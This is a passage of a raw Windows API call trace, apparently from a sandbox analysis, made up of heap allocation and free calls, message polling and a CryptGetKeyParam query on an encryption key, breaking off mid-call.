Flags=0x0, Size=0x1) returned 0x7da318 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0041.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0041.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a26) returned 0xac9478 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.114] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0041.114] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0041.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.115] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da308 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0041.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0041.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.115] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.116] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0041.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.116] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0041.117] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0041.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.118] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.118] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0041.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0041.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0041.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0041.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0041.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.121] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0041.121] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da298, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da298*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.121] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 